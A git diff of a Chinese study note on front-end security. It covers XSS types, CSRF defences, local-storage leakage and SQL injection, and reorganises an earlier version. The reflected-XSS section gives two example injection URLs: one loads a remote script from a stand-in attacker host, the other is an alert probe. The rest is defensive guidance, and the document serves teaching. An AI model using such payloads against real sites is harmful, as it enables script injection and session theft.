前端常见的安全性问题及解决方法

--- a/HTTP/03.md
+++ b/HTTP/03.md
@@ -1,44 +1,64 @@
-### [前端性能优化](https://www.cnblogs.com/lanxiansen/p/10972802.html?ivk_sa=1025922x)
-1. 图片的懒加载----->减少首次加载的http请求次数
-2. 尽量合并、压缩CSS、js文件（打包：webpack、gulp）----->减少http请求次数和请求资源的大小
-3. 使用SVG、字体图标代替png；使用精灵图
-4. 减少cookie的使用----->减少客户端的存储量
-5. 前后端数据交互尽量使用json合适----->资源小，数据处理方便
-6. 减少dom操作
-7. 导入css少用@import，尽量用link----->@import同步，link异步
-8. 避免使用iframe----->iframe不仅不好管控样式，而且相当于在本页面又嵌套其他页面，消耗性能会更大
-### [前端常见的安全性问题及解决方法]()
-1. **XSS跨站脚本攻击**   
-   攻击者通过注入非法的html标签或者javascript代码，从而当用户浏览该网页时，控制用户浏览器。   
-   解决方法：   
-   + **过滤用户的输入**    
-     通过将<> '' ""等字符进行转义，移除用户输入的Style节点、Script节点、Iframe节点。 
-   + **设置httponly属性**    
-     在cookie中设置HttpOnly属性，使js脚本无法读取到cookie信息。
-  > 预防DOM型XSS攻击的方法：
-  1.在使用 .innerHTML、.outerHTML、document.write() 时要特别小心，不要把不可信的数据作为 HTML 插到页面上，而应尽量使用 .textContent、.   setAttribute() 等。
-  2.DOM 中的内联事件监听器，如 location、onclick、onerror、onload、onmouseover 等，\<a> 标签的 href 属性，JavaScript 的 eval()、setTimeout()、setInterval() 等，都能把字符串作为代码运行。如果不可信的数据拼接到字符串中传递给这些 API，很容易产生安全隐患，请务必避免。
-  3.如果用 Vue/React 技术栈，并且不使用 v-html/dangerouslySetInnerHTML 功能，就在前端 render 阶段避免innerHTML、outerHTML 的 XSS 隐患
-  预防 XSS 攻击其他方法：
-  1.开启CSP网页安全政策防止XSS攻击，Content-Security-Policy 中文的意思是网页安全政策，我们只需要在meta属性中设置下即可使用：如下代码： ```<meta http-equiv="Content-Security-Policy" content="">```
-  2.当下React、Vue等框架都从框架层面引入了 XSS 防御机制，一定程度上解放了我们的双手。 但是作为开发人员依然要了解 XSS 基本知识、于细节处避免制造 XSS 漏洞。
-  3.X-XSS-Protection设置，目前该属性被所有的主流浏览器默认开启XSS保护。该参数是设置在响应头中目的是用来防范XSS攻击的。
-2. **CSRF跨站请求伪造**     
-   攻击者诱导受害者进入第三方网站，在第三方网站中，向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的注册凭证，绕过后台的用户验证，达到冒充用户对被攻击的网站执行某项操作的目的。 
-   解决方法：  
-   + **token**
-     由于每次发送需要用户权限的请求都需要携带token或者将token放置在请求头的某处，浏览器不会自动携带。通常token会以本地存储的方式寄存到浏览器中，而恶意网页不具备跨域访问token的能力，自然也不能成功的执行操作，这也是现在市面上大部分API接口的使用方法
-   + **Referer验证**
-     eferer 指的是页面请求来源，意思是，只接受本站的请求，服务器才做响应；如果不是，就拦截。具体方案：为请求头加上一个referer字段，其指向跳转页面之前或者发送请求的那个页面url，这样服务端就知道请求源在哪里，对其进行验证即可知道是在哪个页面发送的请求，要不要为其执行操作和响应数据。
-   + **使用验证码**
-     由于浏览器发送请求的时候会携带cookie，但因为攻击者在恶意网站中由于同源政策的限制，其并不可以跨域访问到另一个域下面的cookie，所以我们可以跟服务端进行协商，通过在cookie中取某一个字段作为验证的筹码，这样就可以判断请求是不是恶意发送的了，这种方法也被称为cookie双重验证。
-3. **本地存储数据泄漏**    
+# 前端常见的安全性问题及解决方法
+## 1. XSS跨站脚本攻击   
+   攻击者通过注入非法的html标签或者javascript代码，从而当用户浏览该网页时，控制用户浏览器。XSS攻击主要分为反射型XSS（非持久型XSS）‌、‌存储型XSS（又称持久型XSS）‌、DOM型XSS‌三种类型。
+### 反射型XSS（非持久型XSS）：
+这是最常见的XSS攻击类型之一。攻击者通过==构造包含恶意脚本的URL==，当受害者点击该链接时，恶意脚本会被执行。这种攻击通常通过HTTP请求参数（如查询字符串、表单提交等）注入恶意代码，然后反射回浏览器执行。反射型XSS不会持久存储在服务器上，需要诱导用户点击特定的链接才能触发。
+比如：
+  ```
+  http://xxx.xxx.xx.xxx:8088/g/getSaveLog?message=”<script src=”http://www.hacktest.com:8002/xss/hacker.js”></script>” 或者：
+
+  http://xxx.xxx.xx.xxx:8088/g/getSaveLog?param=<script>alert(/xss/)</script>
+  ```
+
+
+### ‌存储型XSS（又称持久型XSS）
+：攻击者==将恶意脚本注入到服务器存储的内容中==，通常是数据库、消息板、评论系统等。当其他用户访问这些存储的数据时，恶意脚本会在受害者的浏览器中执行。这种攻击不需要用户点击特定链接，只要访问相关页面即可触发，因此危害更大。
+
+### DOM型XSS
+这种攻击==通过修改页面的DOM结构来执行恶意脚本==。它**不涉及服务器端的数据交互，而是基于客户端JavaScript代码的不当处理**。攻击者通过构造特殊的URL或利用网页中的某些功能（如表单提交、URL参数等），将包含恶意代码的请求发送给受害者。当受害者的浏览器处理这些请求时，恶意代码会修改DOM树，并执行其中的脚本，从而达到攻击目的。
+### 预防方式
+1. 对输入进行严格的验证和过滤
+ 对所有用户输入进行严格的验证和过滤。确保只接受符合预期格式的数据，拒绝或清理不符合的数据。
+2. 对输出进行转义再显示
+  在将用户输入的数据输出到HTML页面时，进行适当的编码。常用的编码方法包括HTML编码、JavaScript编码和URL编码，以防止恶意脚本被执行。在JavaScript中，可以使用encodeURIComponent()来编码URL参数。
+3. 使用安全的库和框架
+使用经过验证的安全库和框架来处理用户输入和输出。例如，使用React、Angular等框架，它们默认会对数据进行安全处理。
+4. 内容安全策略（CSP）：
+配置 CSP 来限制浏览器可以执行的脚本来源。CSP可以有效地防止未授权的脚本执行。Content-Security-Policy 中文的意思是网页安全政策，我们只需要在meta属性中设置下即可使用：如下代码： ```<meta http-equiv="Content-Security-Policy" content="">```
+5. HTTPOnly 和 Secure 标志：
+==为Cookie设置HTTPOnly和Secure标志==，以防止通过JavaScript访问Cookie。
+6. 在使用 .innerHTML、.outerHTML、document.write() 时要特别小心，不要把不可信的数据作为 HTML 插到页面上，而应尽量使用 .textContent、.   setAttribute() 等。
+7. DOM 中的内联事件监听器，如 location、onclick、onerror、onload、onmouseover 等，\<a> 标签的 href 属性，JavaScript 的 eval()、setTimeout()、setInterval() 等，都能把字符串作为代码运行。如果不可信的数据拼接到字符串中传递给这些 API，很容易产生安全隐患，请务必避免。
+8. 如果用 Vue/React 技术栈，并且不使用 v-html/dangerouslySetInnerHTML 功能，就在前端 render 阶段避免innerHTML、outerHTML 的 XSS 隐患
+9. X-XSS-Protection设置，目前该属性被所有的主流浏览器默认开启XSS保护。该参数是设置在响应头中目的是用来防范XSS攻击的。
+
+
+## 2. CSRF跨站请求伪造 
+CSRF（跨站请求伪造）是一种网络攻击，攻击者诱导受害者进入第三方网站，并在该网站中向被攻击网站发送请求。由于受害者在被攻击网站上已经登录，攻击者可以利用受害者的身份执行未授权的操作
+### 解决方法：
+#### 使用token
+由于每次发送需要用户权限的请求都需要携带token或者将token放置在请求头的某处，浏览器不会自动携带。通常token会以本地存储的方式寄存到浏览器中，而恶意网页不具备跨域访问token的能力，自然也不能成功的执行操作，这也是现在市面上大部分API接口的使用方法
+#### Referer验证
+Referer 指的是页面请求来源，意思是，只接受本站的请求，服务器才做响应；如果不是，就拦截。具体方案：为请求头加上一个referer字段，其指向跳转页面之前或者发送请求的那个页面url，这样服务端就知道请求源在哪里，对其进行验证即可知道是在哪个页面发送的请求，要不要为其执行操作和响应数据。
+#### 双重Cookie验证
+由于浏览器发送请求的时候会携带cookie，但因为攻击者在恶意网站中由于同源政策的限制，其并不可以跨域访问到另一个域下面的cookie，所以我们可以跟服务端进行协商，通过在cookie中取某一个字段作为验证的筹码，这样就可以判断请求是不是恶意发送的了。
+
+
+## 3. 本地存储数据泄漏
    解决方案：     
    + **不在本地存储重要数据**
    + **加密**   
      所有在放到cookie中的信息或者localStorage里的信息要进行加密
 
-## cookie session 与 token
+## 4. SQL注入
+SQL注入是一种通过将恶意SQL代码插入到查询字符串中，从而在数据库中执行未经授权的SQL语句的攻击方式。比如用户在输入框中输入SQL语句，然后提交，如果服务端没有对用户输入进行过滤，那么就会导致SQL注入。
+### 解决方案：
+   + **前端过滤输入内容**
+    过滤输入内容就是在数据提交到数据库之前，就把用户输入中的不合法字符剔除掉。尽管前端可以采取这些措施，但最重要的SQL注入防护措施应该在后端实现。后端应该使用参数化查询、ORM和其他安全实践来确保数据库的安全。
+   + **使用参数化查询**
+   + **使用ORM框架**
+
+# cookie session 与 token
 ### cookie
 cookie 最开始被设计出来是为了弥补HTTP在状态管理上的不足。HTTP 协议是一个无状态协议，客户端向服务器发请求，服务器返回响应，请求就这样结束了，但是下次发请求如何让服务端知道客户端是谁呢？这种背景下，就产生了 cookie。
 **cookie 存储在客户端， cookie 是服务器发送到用户浏览器并保存在本地的一小块数据，它会在浏览器下次向同一服务器再发起请求时被携带并发送到服务器上**。
